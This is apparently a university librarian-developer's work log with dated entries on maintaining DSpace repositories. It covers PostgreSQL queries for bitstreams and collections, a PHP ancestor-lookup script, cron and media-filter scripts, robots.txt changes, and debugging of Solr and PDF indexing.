Main

February 7, 2012

Select to find ascii control characters in DSPACE (i.e. in the postgres DB)

SQL select for CNT Chars

The command below will find DSPACE titles that contain ascii control characters (less than 31).
 select  handle, title, item.last_modified   from item, handle, itemsbytitle  where item.item_id = handle.resource_id  AND itemsbytitle.item_id = item.item_id AND last_modified > '2012-01-28'  AND title ~ ('[^'||chr(31)||'-'||chr(255)||']')  ;

Reason for the Range

The site:
http://www.asciitable.com/
Shows that the control characters in ASCII are all less than 32.

Result of the search

handle |                                                           title                                                            |       last_modified        
--------+----------------------------------------------------------------------------------------------------------------------------+----------------------------
 47226  | Pouvoir, violence et resistance en postcolonie : une lecture de en attendant le vote des betes Sauvages E’Ahmadou Kourouma | 2012-02-04 01:11:16.764-06
(1 row)
s

Converting the title to hex and sorting


[silvi003:~]$ echo 'Pouvoir, violence et resistance en postcolonie : une lecture de en attendant le vote des betes Sauvages E’Ahmadou Kourouma'
  | hexdump -v -e '"\\\x" 1/1 "%02x" " "' | perl -p -i -e 's/ /\n/g' | sort | uniq -c  
   1 \x0a
  18 \x20
   1 \x2c
   1 \x3a
   1 \x41
   1 \x45
   1 \x4b
   1 \x50
   1 \x53
   7 \x61
   1 \x62
   4 \x63
   4 \x64
  19 \x65
   1 \x67
   1 \x68
   4 \x69
   4 \x6c
   2 \x6d
   8 \x6e
  10 \x6f
   1 \x70
   4 \x72
   6 \x73
   9 \x74
   7 \x75
   4 \x76
   1 \x80
   1 \x99
   1 \xe2
There is a line feed in the title (\x0a), and this happens to be the last character.

ISSUE

The regex above will select strings with a CR.
000 1101 	015 	13 	0D 	CR 	␍ 	^M 	\r 	Carriage return[g]
This is bad. I need to put in some sort of "OR" for this.

November 18, 2011

Number of assets per item in AgEcon

File that contains a list of all bitstreams in Agecon

less transfer.sh

./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_61536/urepository_2.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_61536/urepository_1.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_99776/urepository_1.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_114550/urepository_2.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_114550/urepository_1.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_93451/urepository_1.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_93451/urepository_2.pdf
                                                        ^               ^
                                                        |               |
                                                    Handle            Bitstream number
handle 
[swadm:/swadm/assetstore_stage]$ cat transfer.sh  | perl -p -i -e 's/(.\/AssetsUDC\/Assets_Found201111.*asset_)(\d+)(\/urepository_)(\d+)(\.pdf)/\4/g' | sort | uniq -c | sort -nk 2 


Number  Assets
of       per 
Items    item 
  48971 1
  21191 2
    116 3
     13 4
      4 5
      3 6
      2 7
      1 8
      1 9
      1 10

November 14, 2011

DSPACE mime types for AgEcon ... Very few excel

Below is a list of all the MIME types supported by DSPACE

 bitstream_format_id |           mimetype            |  short_description   |                             description                              | support_level | internal 
---------------------+-------------------------------+----------------------+----------------------------------------------------------------------+---------------+----------
                   3 | application/pdf               | PDF                  | Adobe Portable Document Format                                       |             1 | f
                   1 | application/octet-stream      | Unknown              | Unknown data format                                                  |             0 | f
                   2 | text/plain                    | License              | Item-specific license agreed upon to submission                      |             1 | t
                   4 | text/xml                      | XML                  | Extensible Markup Language                                           |             1 | f
                   5 | text/plain                    | Text                 | Plain Text                                                           |             1 | f
                   6 | text/html                     | HTML                 | Hypertext Markup Language                                            |             1 | f
                   7 | text/css                      | CSS                  | Cascading Style Sheets                                               |             1 | f
                   8 | application/msword            | Microsoft Word       | Microsoft Word                                                       |             1 | f
                   9 | application/vnd.ms-powerpoint | Microsoft Powerpoint | Microsoft Powerpoint                                                 |             1 | f
                  10 | application/vnd.ms-excel      | Microsoft Excel      | Microsoft Excel                                                      |             1 | f
                  11 | application/marc              | MARC                 | Machine-Readable Cataloging records                                  |             1 | f
                  12 | image/jpeg                    | JPEG                 | Joint Photographic Experts Group/JPEG File Interchange Format (JFIF) |             1 | f
                  13 | image/gif                     | GIF                  | Graphics Interchange Format                                          |             1 | f
                  14 | image/png                     | image/png            | Portable Network Graphics                                            |             1 | f
                  15 | image/tiff                    | TIFF                 | Tag Image File Format                                                |             1 | f
                  16 | audio/x-aiff                  | AIFF                 | Audio Interchange File Format                                        |             1 | f
                  17 | audio/basic                   | audio/basic          | Basic Audio                                                          |             1 | f
                  18 | audio/x-wav                   | WAV                  | Broadcase Wave Format                                                |             1 | f
                  19 | video/mpeg                    | MPEG                 | Moving Picture Experts Group                                         |             1 | f
                  20 | text/richtext                 | RTF                  | Rich Text Format                                                     |             1 | f
                  21 | application/vnd.visio         | Microsoft Visio      | Microsoft Visio                                                      |             1 | f
                  22 | application/x-filemaker       | FMP3                 | Filemaker Pro                                                        |             1 | f
                  23 | image/x-ms-bmp                | BMP                  | Microsoft Windows bitmap                                             |             1 | f
                  24 | application/x-photoshop       | Photoshop            | Photoshop                                                            |             1 | f
                  25 | application/postscript        | Postscript           | Postscript Files                                                     |             1 | f
                  26 | video/quicktime               | Video Quicktime      | Video Quicktime                                                      |             1 | f
                  27 | audio/x-mpeg                  | MPEG Audio           | MPEG Audio                                                           |             1 | f
                  28 | application/vnd.ms-project    | Microsoft Project    | Microsoft Project                                                    |             1 | f
                  29 | application/mathematica       | Mathematica          | Mathematica Notebook                                                 |             1 | f
                  30 | application/x-latex           | LateX                | LaTeX document                                                       |             1 | f
                  31 | application/x-tex             | TeX                  | Tex/LateX document                                                   |             1 | f
                  32 | application/x-dvi             | TeX dvi              | TeX dvi format                                                       |             1 | f
                  33 | application/sgml              | SGML                 | SGML application (RFC 1874)                                          |             1 | f
                  34 | application/wordperfect5.1    | WordPerfect          | WordPerfect 5.1 document                                             |             1 | f
                  35 | audio/x-pn-realaudio          | RealAudio            | RealAudio file                                                       |             1 | f
                  36 | image/x-photo-cd              | Photo CD             | Kodak Photo CD image                                                 |             1 | f

A file with the wrong bitstream_format_id

 
handle | bitstream_id | bitstream_format_id |                    name                     | size_bytes |             checksum             | checksum_algorithm | description | user_format_description |                                     source                                      |               internal_id               | deleted | store_number | sequence_id 
--------+--------------+---------------------+---------------------------------------------+------------+----------------------------------+--------------------+-------------+-------------------------+---------------------------------------------------------------------------------+-----------------------------------------+---------+--------------+-------------
 95522  |        74367 |                   1 | Staff Paper P10-8--InSTePP10-04.revised pdf |     313884 | 35f4304e6a0c68e935c09c0469a9e291 | MD5                |             |                         | /dspace/assetstore/dspace-sr/upload/Staff Paper P10-8--InSTePP10-04.revised pdf | 102028865626877833459313413758816463357 | f       |            0 |           2
(1 row)

This is labeled as Unknown, but should be PDF. The line below changed it:
 
dspace_sr=> 
dspace_sr=> UPDATE bitstream SET bitstream_format_id = '3' WHERE bitstream_id = '74367';
UPDATE 1

Distribution of bitstream_format_id

The sql query that pulls only live bitstreams:
[silvi003:~]$ cat cmdMime.sql 
\f ','
\a
\t
\o outputfile.csv
SELECT bitstream_format_id  FROM handle,item, item2bundle,bitstream,bundle2bitstream WHERE  handle.resource_type_id=2 AND handle.resource_id = item2bundle.item_id AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND handle.resource_id=item.item_id AND item.withdrawn='f' AND   bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.deleted = 'f'  ;
\o
\q
[silvi003:~]$ psql -U dspace_sr  dspace_sr  < cmdMime.sql
Number count of bitstream_format_id

[silvi003:~]$ cat outputfile.csv | sort | uniq -c | sort -n 
      # bitstream_format_id
      1 1
      2 10
  20602 2
  48265 3

the odd bitstream_format_id

Most of the the bitstreams are PDFs ( bitstream_format_id 3) or liscense (bitstream_format_id 2). There is one Unknown (bitstream_format_id 1) and two excel (bitstream_format_id 10). They are shown below:
bitstream_format_id =1
dspace_sr=> SELECT handle, bitstream.*  FROM handle,item2bundle,bitstream,bundle2bitstream WHERE  handle.resource_type_id=2 AND handle.resource_id = item2bundle.item_id AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND handle.resource_id=item.item_id AND item.withdrawn='f' AND   bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.deleted = 'f'  AND bitstream_format_id=1;
NOTICE:  adding missing FROM-clause entry for table "item"
 handle | bitstream_id | bitstream_format_id |                          name                           | size_bytes |             checksum             | checksum_algorithm | description | user_format_description |                                           source                                            |              internal_id               | deleted | store_number | sequence_id 
--------+--------------+---------------------+---------------------------------------------------------+------------+----------------------------------+--------------------+-------------+-------------------------+---------------------------------------------------------------------------------------------+----------------------------------------+---------+--------------+-------------
 62242  |        59248 |                   1 | data appendix jayasinghe Beghin Moschini ajae 9007.xlsx |     141434 | 6f40baf7dd97f784091e69ed8714b837 | MD5                |             |                         | /dspace/assetstore/dspace-sr/upload/data appendix jayasinghe Beghin Moschini ajae 9007.xlsx | 13124464764865665476393448862247227640 | f       |            0 |           3
(1 row)


bitstream_format_id =10
dspace_sr=> SELECT handle, bitstream.*  FROM handle,item2bundle,bitstream,bundle2bitstream WHERE  handle.resource_type_id=2 AND handle.resource_id = item2bundle.item_id AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND handle.resource_id=item.item_id AND item.withdrawn='f' AND   bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.deleted = 'f'  AND bitstream_format_id=10;
NOTICE:  adding missing FROM-clause entry for table "item"
 handle | bitstream_id | bitstream_format_id |                  name                   | size_bytes |             checksum             | checksum_algorithm |        description         | user_format_description |                                                         source                                                          |              internal_id               | deleted | store_number | sequence_id 
--------+--------------+---------------------+-----------------------------------------+------------+----------------------------------+--------------------+----------------------------+-------------------------+-------------------------------------------------------------------------------------------------------------------------+----------------------------------------+---------+--------------+-------------
 42187  |        32967 |                  10 | MissouriUseValueCalculationsOct2007.xls |     361472 | cbefd6d4008ba5d97db49d2b9178f89f | MD5                | Excel Spreadsheet          |                         | /dspace/assetstore/dspace-sr/upload/C:\Documents and Settings\Lori\My Documents\MissouriUseValueCalculationsOct2007.xls | 87756269209817911914027269532862968326 | f       |            0 |           3
 92231  |        61062 |                  10 | stpap536.data.zip                       |     741798 | b48a9d5aa21f3d8411230bde4651e4fe | MD5                | Data in zipped Excel files |                         | /dspace/assetstore/dspace-sr/upload/stpap536.data.zip                                                                   | 28095595994115196972466977473167819715 | f       |            0 |           3
(2 rows)


October 21, 2011

Finding all the collections a DSPACE item belongs to

Multi-level tree in AgEcon

The list below gives an item that is under several layers in the DSPACE tree.
AgEcon Search
  Universitaet Hohenheim>
   Institute of Agricultural Policy and Agricultural Markets >
      Working Papers >
        A 2004 Social Accounting Matrix for Israel>

SQL to determine names of ancestors of an item

Item to collection

Starting handle = 110156

SQL for item handle to collection handle

SELECT handle FROM handle WHERE resource_type_id=3 AND resource_id=(SELECT collection.collection_id FROM collection, collection2item, item, handle WHERE collection2item.item_id=item.item_id AND collection2item.collection_id=collection.collection_id AND handle.resource_id=item.item_id AND resource_type_id=2 AND handle = 110156) ;
collection handle: 93692

Collection Name SQL

select name from handle, collection where handle = 93692 AND resource_type_id= 3 AND collection_id = handle.resource_id;

Collection to Community

SQL for Collection handle to Community handle

SELECT handle FROM community2collection, handle WHERE handle.resource_type_id =4 AND community2collection.community_id = handle.resource_id AND community2collection.collection_id = (SELECT resource_id FROM handle WHERE resource_type_id= 3 AND handle= 93692);
community level 1: 93691

community name SQL

select name from handle, community where handle = 93691 AND resource_type_id= 4 AND community_id = handle.resource_id;

Next Community level

SELECT handle FROM community2collection, handle WHERE handle.resource_type_id =4 AND community2collection.community_id = handle.resource_id AND community2collection.collection_id = (SELECT resource_id FROM handle WHERE resource_type_id= 3 AND handle= 93691);
top 93690

Proof that 93690 is top

SELECT handle FROM community2community, handle WHERE handle.resource_type_id =4 AND community2community.parent_comm_id = handle.resource_id AND community2community.child_comm_id = (SELECT resource_id FROM handle WHERE resource_type_id= 4sss AND handle= 93690);
returns nothing

PHP code

The code below will pull the names of all the ancestors of an item.
#!/usr/bin/php 
 $value)
 echo $key.'=>'.$value."\n";

//
// Test should produce: (1 indicates a primary community, 0 is a lower level)
//
// Content-type: text/html
// X-Powered-By: PHP/4.3.9
// 
// Working Papers=>0
// Universitaet Hohenheim=>1
// Institute of Agricultural Policy and Agricultural Markets=>0


// if you are interesed in the parents of a collection call:
// process_collection 

// if you are interesed in the parents of a community call:
// process_community 


function ancestor_names($item_handle, &$ancestors){
  include("port_DSPACE_sql.inc.php");
  $dbh = open_DSPACE_DB();  // opens a connection to the DSPACE psql database

// This query will find a collection handle given an item handle
  $item_to_collection_query="SELECT handle FROM handle WHERE resource_type_id=3 AND 
          resource_id=(SELECT collection.collection_id 
          FROM collection, collection2item, item, handle 
          WHERE collection2item.item_id=item.item_id 
          AND collection2item.collection_id=collection.collection_id 
          AND handle.resource_id=item.item_id AND resource_type_id=2 
          AND handle = $item_handle) ; ";

  $result = pg_query($item_to_collection_query);
  if (!$result) {
    echo "Problem with query " . $item_to_collection_query . "\n";
    echo pg_last_error();
    exit();
  }


// Could have multiple collection parents
while ($collection_handle = pg_fetch_row($result)) {
     process_collection($collection_handle[0], $ancestors);
}
}
 
 function process_collection($collection_handle,  &$ancestors){
 $collection_title_query = "select name from handle, collection where handle = 93692 AND resource_type_id= 3 AND collection_id = handle.resource_id;";
  $result = pg_query($collection_title_query);
  if (!$result) {
    echo "Problem with query " . $collection_title_query . "\n";
    echo pg_last_error();
    exit();
  }

while ($collection_title = pg_fetch_row($result)) {
  $ancestors[$collection_title[0]] = 0;
}
   collection_to_community ($collection_handle, $ancestors);
 }

// climbs the tree from the collection to the comunity level
function collection_to_community ($collection_handle,  &$ancestors) {
  $collection_to_commuity_query="SELECT handle FROM community2collection, handle 
                                WHERE handle.resource_type_id =4 AND 
                                community2collection.community_id = handle.resource_id AND
                                community2collection.collection_id = 
                                (SELECT resource_id FROM handle WHERE 
                                resource_type_id= 3 AND handle= $collection_handle);";
  $result = pg_query($collection_to_commuity_query);
  if (!$result) {
    echo "Problem with query " . $collection_to_commuity_query . "\n";
    echo pg_last_error();
    exit();
  }

while ($community_handle = pg_fetch_row($result)) {
     process_community($community_handle[0],$ancestors);
}

}


// finds the community title and recursively finds all higher level collections
function process_community ($community_handle, &$ancestors) {
 $community_title_query = "select name from handle, community where handle = $community_handle AND resource_type_id= 4 AND community_id = handle.resource_id; ";
 
  $result = pg_query($community_title_query);
  if (!$result) {
    echo "Problem with query " . $community_title_query . "\n";
    echo pg_last_error();
    exit();
  }
$community_title="";
while ($row = pg_fetch_row($result)) {
  $community_title = $row[0] ;
}

  $community_to_community_query="SELECT handle FROM community2community, handle WHERE 
                                handle.resource_type_id =4 AND 
                                community2community.parent_comm_id = handle.resource_id AND 
                                community2community.child_comm_id = (SELECT resource_id 
                                FROM handle WHERE resource_type_id= 4 AND handle= $community_handle); ";
  $result = pg_query($community_to_community_query);
  if (!$result) {
    echo "Problem with query " . $collection_to_commuity_query . "\n";
    echo pg_last_error();
    exit();
  }
$this_community_is_top = 1;
while ($row = pg_fetch_row($result)) {
  // if we get into this loop there is a higher community
  $this_community_is_top = 0;
  process_community($row[0],$ancestors );
}
  $ancestors[$community_title] = $this_community_is_top;
}
 ?>

Every item maps to a collection

Number of item handles:
dspace_sr=> select count (handle) from handle where resource_type_id=2;
 count 
-------
 48653
Number of item links to collections:
dspace_sr=> select count (item_id) from collection2item;
 count 
-------
 48653

Communities do not have multiple parents

I also checked the community2community table and there were no duplicate child_comm_id values. This implies that the children have one and only one parent.

September 29, 2011

Reason why Islandora could not connect to SOLR on stage

The bug

When we tried to connect to solr from islandora we got the error:
Unable to connect to Solr server 

Islandora code connected to the problem

This error is generated in the Islandora file:
./sites/all/modules/Islandora-islandora_solr_search-9e474f7/solr.admin.inc: The following function is the root cause of the problem:

/**
 *
 * @param String $solr_url
 * @return boolean
 *
 * Checks availability of Solr installation
 *
 */
function solr_available($solr_url) {
  // path from url is parsed to allow graceful inclusion or exclusion of 'http://'
  $pathParts = parse_url($solr_url); 
  $path = 'http://' . $pathParts['host'] . ':' . $pathParts['port'] . $pathParts['path'] . '/admin/file';
  $test = @fopen($path, "r");
  if ($test) {
    return true;
  }
  return false;
}
    

The fix (upgrade SOLR)

It turns out that solr 3.1 cannot recognize the
"/admin/file"
at the end of a URL. We upgraded to SOLR 3.4 and it worked.

September 23, 2011

Switch in UDC Media filter.

I changed the Media Filter so that it would not use the unix nice command when it launches. This should speed up the process.

Crontab

@reboot /sbin/service httpd start @reboot sudo -u tomcat /dspace/bin/start_tomcat.sh # day of week (0 - 6) (Sunday=0) 10 1 * * 6 /dspace/dspace-ir/bin/media_launch.sh 30 22 * * 1 /dspace/dspace-sr/bin/index-all-cron 30 22 * * 2 /dspace/dspace-ir/bin/index-all-cron 30 22 * * 3 /dspace/dspace-sr/bin/index-all-cron 30 22 * * 4 /dspace/dspace-ir/bin/index-all-cron 30 22 * * 5 /dspace/dspace-sr/bin/index-all-cron

media_launch.sh

tstamp=`date "+%Y%m%d_%H:%M"` echo $tstamp nice /dspace/dspace-ir/bin/filter-media.sh > /dspace/dspace-ir/log/filter-media.sh_$tstamp.log 2>&1 cd /dspace/dspace-ir/bin/ /dspace/dspace-ir/bin/index_check_and_email.sh

filter-media.sh

Note the "-n" in filter-media means that the index will not be made after each collection is OCRed. Also in the runs using "nice" the "-n" was also used.
#!/bin/sh # This script grabs the handles of each collection # in a DSpace DB instance. Then loops through the # handles and run the full-text indexer against each # collection. # This is done to fix out of memory errors, # PDFs that are too large for full-text indexing, # and when filter-media (java app) fails now full # text indexing continues on other collections. # Setup the environment JAVA_HOME=/opt/jdk1.5.0_10 PATH=$JAVA_HOME/bin:/opt/ant/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin export PATH JAVA_HOME dbname="dspace_ir" username="read_only" hostname="strip3.oit.umn.edu" # Determine if we have Postgres client installed which psql > /dev/null if [ $? -ne 0 ] then echo echo "psql not found in your PATH, please add to your PATH and re-run script" echo exit 1 fi print_usage() { echo 1>&2 "Usage: $0 [-d dbname] [-u username]" exit 1; } while getopts d:hu: o do case "$o" in d) dbname="$OPTARG";; h) print_usage;; n) hostname="$OPTARG";; u) username="$OPTARG";; [?]) print_usage;; esac done echo_cmd="echo SELECT handle FROM handle WHERE resource_type_id=3;" psql_cmd="psql -t -U $username -h $hostname $dbname" BINDIR=`dirname $0` for handle in `$echo_cmd | $psql_cmd` do $BINDIR/filter-media -n -i $handle done $BINDIR/index-all

September 15, 2011

items in DSAPCE with in_archive =f and withdrawn = f

Problem

Louise told me that the following two purls produced an error when accessed:
http://purl.umn.edu/114817
http://purl.umn.edu/113790

The cause

It turns our that both in_archive and withdrawn are set to false.
dspace_sr=> select * from handle where handle = 113790;
 handle_id | handle | resource_type_id | resource_id 
-----------+--------+------------------+-------------
     51427 | 113790 |                2 |       53352


dspace_sr=> select * from item where item_id = 53352;

 item_id | submitter_id | in_archive | withdrawn |       last_modified        | owning_collection 
---------+--------------+------------+-----------+----------------------------+-------------------
   53352 |         2680 | f          | f         | 2011-08-25 12:58:34.912-05 |                  
(1 row)
I think that both variables should not be set to f.

The solution

Set withdrawn to t and the Louise can resubmit the metadata:
UPDATE item SET withdrawn = 'T' WHERE item_id = 53352;

June 10, 2011

crons on strip3 (DB side of DSPACE)

# Clean up the databases nightly
20 0 * * * vacuumdb -U dspace_ir --analyze dspace_ir > /dev/null 2>&1
40 0 * * * vacuumdb -U dspace_sr --analyze dspace_sr > /dev/null 2>&1

# Backup the databases nightly
2 1 * * * /var/lib/pgsql/backup.sh

# MySQL backup
5 0 * * * /opt/mysql/bin/backup.sh

crawler not working for UDC

Problem

For conservancy.umn.edu we have not been getting good crawls from the University crawl app.

New robots.txt file

I changed the robot.txt file allow crawling down the subject browse tree:
# removed Disallow: /browse-subject line
User-agent: *
Disallow: /browse-author
Disallow: /browse-title
Disallow: /browse-date
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author
Disallow: /*/browse-title
Disallow: /*/browse-date
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search

Results with new robots.txt file

and then asked Curt Squires to crawl UDC again. He found:
A test search on inurl:conservancy.umn.edu shows about 8100 hits, so I think we're still missing some stuff. http://google.umn.edu/search?q=inurl%3Aconservancy.umn.edu&btnG=Google+Search&access=p&client=default_frontend&output=xml_no_dtd&proxystylesheet=default_frontend&ie=UTF-8&entqr=0&oe=UTF-8&ud=1&site=entire_index

Future plans

Curt is out of town until next Wed. When he gets back, I will allow the robots to go down the browse title path. Since all of the assets have to have titles that path should get everything. The new robots.txt file will be:
# Remove the lines:
# Disallow: /browse-title
# Disallow: /*/browse-title

User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-date
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author
Disallow: /*/browse-date
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search

April 26, 2011

sql to pull relation metadata

select text_value from metadatavalue, handle where metadata_field_id=40 AND item_id=handle.resource_id AND handle.resource_type_id=2 AND handle.resource_id=item.item_id AND item.withdrawn='f';

April 16, 2011

Pulling handles and bitstreams from dspace & Handles with no bitstreams

I used the sql below to pull pull the bitstream data

[silvi003@strip3 ~]$ cat asset_dump.sql
 select handle.handle, bitstream.name,  bitstream.sequence_id , bitstream.internal_id 
    from handle,item2bundle,bitstream,bundle2bitstream, item where
    handle.resource_id = item2bundle.item_id AND  handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND
    bundle2bitstream.bitstream_id = bitstream.bitstream_id AND bitstream.deleted='f'  AND handle.resource_id=item.item_id AND 
    item.withdrawn='f' order by handle::text::integer;

I then filtered the license.txt bitstreams with:

psql -U dspace_sr dspace_sr < asset_dump.sql | grep -v license.txt > bitstreams.dump

To pull all the live the handles of live items

select handle from handle, item where handle.resource_type_id=2 AND handle.resource_id=item.item_id AND item.withdrawn='f'  order by 
handle::text::integer;

Some items do not have assets

I found 24 of the 44257 handles that have no asset associated with it. These handles are:
7816
7841
9351
9370
9682
9823
9920
10059
10353
19505
20042
21179
21327
21471
25360
25800
28566
44158
44165
44795
44822
48905
51903
61520

If you look in AgEcon:

http://ageconsearch.umn.edu/handle/61520

You find the message:

Files in This Item:

There are no files associated with this item.

February 9, 2011

Modify DSPACE to accept external text files instead of using DSPACE's internal OCR system.

Introduction

To achieve this I had to modify the processBitstream method in MediaFilter.java. This allows the input of an external text file instead of using the native DSPACE OCR system. It has the "ABBYY" appendage because we plan on using the ABBYY OCR system.

Classes modified

./src/org/dspace/app/mediafilter/MediaFilter.java
./src/org/dspace/app/mediafilter/MediaFilterManager.java

Method written

processBitstream_ABBYY (in MediaFilter.java)

Bitstreams before executing code

dspace_ir_silvi003_2011_02=# SELECT bitstream.* FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND handle=56424;

 bitstream_id | bitstream_format_id |         name         | size_bytes |             checksum             | checksum_algorithm | description | user_format_description |                           source                            |               internal_id               | deleted | store_number | sequence_id 
--------------+---------------------+----------------------+------------+----------------------------------+--------------------+-------------+-------------------------+-------------------------------------------------------------+-----------------------------------------+---------+--------------+-------------
            3 |                   3 | Brief_2003-98677.pdf |     626917 | 9d159b478e66b012bada96b9c3df77f2 | MD5                |             |                         | /home/silvi003/dspace/dspace-ir/upload/Brief_2003-98677.pdf | 84690010223348412237368928451773250266  | f       |            0 |           1
            4 |                   2 | license.txt          |       1355 | 1d8ffcef0e2c0982456aa8c8a736e26d | MD5                |             |                         | Written by org.dspace.content.Item                          | 121016793780646677673477451716426805228 | f       |            0 |           2
(2 rows)

Bitstreams after executing code

dspace_ir_silvi003_2011_02=# SELECT bitstream.* FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND handle=56424;
 bitstream_id | bitstream_format_id |           name           | size_bytes |             checksum             | checksum_algorithm |  description   | user_format_description |                           source                            |               internal_id               | deleted | store_number | sequence_id 
--------------+---------------------+--------------------------+------------+----------------------------------+--------------------+----------------+-------------------------+-------------------------------------------------------------+-----------------------------------------+---------+--------------+-------------
            3 |                   3 | Brief_2003-98677.pdf     |     626917 | 9d159b478e66b012bada96b9c3df77f2 | MD5                |                |                         | /home/silvi003/dspace/dspace-ir/upload/Brief_2003-98677.pdf | 84690010223348412237368928451773250266  | f       |            0 |           1
            4 |                   2 | license.txt              |       1355 | 1d8ffcef0e2c0982456aa8c8a736e26d | MD5                |                |                         | Written by org.dspace.content.Item                          | 121016793780646677673477451716426805228 | f       |            0 |           2
            5 |                   5 | Brief_2003-98677.pdf.txt |     441997 | 2a395efbb6798effbd31b78cc410c554 | MD5                | Extracted text |                         | Written by MediaFilter org.dspace.app.mediafilter.PDFFilter | 117268227247096420229650348692064973457 | f       |            0 |           3
(3 rows)

January 27, 2011

Indexer problem and old libraries

When the full text indexer tries to process a single handle it gives a class not found exception

The plan

1) Locate a handle that with less than a Meg in size that has not ben indexed. Confirm this by directly checking the postgres DB.

2) Find the files in the library that have changed between now and Wed, 18 Feb 2009 (files pulled from the last commit to the odin system).

3) Run the indexer with current library files ... expect failure.

4) Replace the library files with the old values and run the indexer ... anticipate success.


Results:

1) Handle that has not been indexed

Handle 608 has not been indexed.

Handle Name Bytes
608 | 200615.pdf | 842375


If this had been indexed the query below should yield a *.pdf.txt file.


select handle.handle, bitstream.name, bitstream.size_bytes from
handle,item2bundle,bitstream,bundle2bitstream where handle.resource_id = item2bundle.item_id and
handle.resource_type_id=2 and item2bundle.bundle_id=bundle2bitstream.bundle_id and
bundle2bitstream.bitstream_id = bitstream.bitstream_id and handle = 608;

However we get


handle | name | size_bytes --------+------------+------------
608 | 200615.pdf | 842375
(1 row)


2) Comparison of old and new libraries.



ulwal-320-bu-m:~ silvi003$ dirdiff lib_old lib_new
No matching file: lib_old/PDFBox.jar
No matching file: lib_new/commons-collections-3.2.1.jar
No matching file: lib_new/jcaptcha-1.0-all.jar
No matching file: lib_new/jxl.jar
No matching file: lib_new/pdfbox-1.1.0.jar

Run the indexer with current library files ... expect failure.

First make a dspace-ir test space.
[silvi003@strip1 dspace]$ tu cp -R dspace-ir dspace-ir_test

It did fail:
[silvi003@strip1 bin]$ tu ./filter-media -i  608
Applying Media Filters
:/dspace/dspace-ir_test/lib/activation.jar:/dspace/dspace-ir_test/lib/commons-cli.jar:/dspace/dspace-ir_test/lib/commons-codec-1.3.jar:/dspace/dspace-ir_test/lib/commons-collections-3.2.1.jar:/dspace/dspace-ir_test/lib/commons-collections.jar:/dspace/dspace-ir_test/lib/commons-dbcp.jar:/dspace/dspace-ir_test/lib/commons-fileupload.jar:/dspace/dspace-ir_test/lib/commons-io.jar:/dspace/dspace-ir_test/lib/commons-lang-2.1.jar:/dspace/dspace-ir_test/lib/commons-pool.jar:/dspace/dspace-ir_test/lib/fontbox.jar:/dspace/dspace-ir_test/lib/handle.jar:/dspace/dspace-ir_test/lib/jakarta-poi.jar:/dspace/dspace-ir_test/lib/jargon.jar:/dspace/dspace-ir_test/lib/jaxen.jar:/dspace/dspace-ir_test/lib/jcaptcha-1.0-all.jar:/dspace/dspace-ir_test/lib/jdom.jar:/dspace/dspace-ir_test/lib/jena.jar:/dspace/dspace-ir_test/lib/jstl.jar:/dspace/dspace-ir_test/lib/jxl.jar:/dspace/dspace-ir_test/lib/log4j.jar:/dspace/dspace-ir_test/lib/lucene.jar:/dspace/dspace-ir_test/lib/lucene-sandbox.jar:/dspace/dspace-ir_test/lib/mail.jar:/dspace/dspace-ir_test/lib/mets.jar:/dspace/dspace-ir_test/lib/oaicat.jar:/dspace/dspace-ir_test/lib/oro.jar:/dspace/dspace-ir_test/lib/pdfbox-1.1.0.jar:/dspace/dspace-ir_test/lib/pg74.216.jdbc3.jar:/dspace/dspace-ir_test/lib/rome.jar:/dspace/dspace-ir_test/lib/serializer.jar:/dspace/dspace-ir_test/lib/servlet.jar:/dspace/dspace-ir_test/lib/standard.jar:/dspace/dspace-ir_test/lib/tm-extractors.jar:/dspace/dspace-ir_test/lib/xalan.jar:/dspace/dspace-ir_test/lib/xercesImpl.jar:/dspace/dspace-ir_test/lib/xml-apis.jar:/dspace/dspace-ir_test/config:/dspace/src/dspace-ir/build/classes/
########################################### 
Collection handle: 608
*********************************************
Handle 608
Bitstream ID 2287
Filter org.dspace.app.mediafilter.PDFFilter
Bitstream supports filter true
Bitstream name 200615.pdf.txt
Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/commons/logging/LogFactory
	at org.apache.pdfbox.util.PDFStreamEngine.(PDFStreamEngine.java:63)
	at org.dspace.app.mediafilter.PDFFilter.getDestinationStream(PDFFilter.java:102)
	at org.dspace.app.mediafilter.MediaFilter.processBitstream(MediaFilter.java:159)
	at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:357)
	at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:311)
	at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:272)
	at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:211)
[silvi003@strip1 bin]$ 

4) Replace the library files with the old values and run the indexer ... anticipate success.

This fails:
[silvi003@strip1 bin]$ tu ./filter-media -i  608
Applying Media Filters
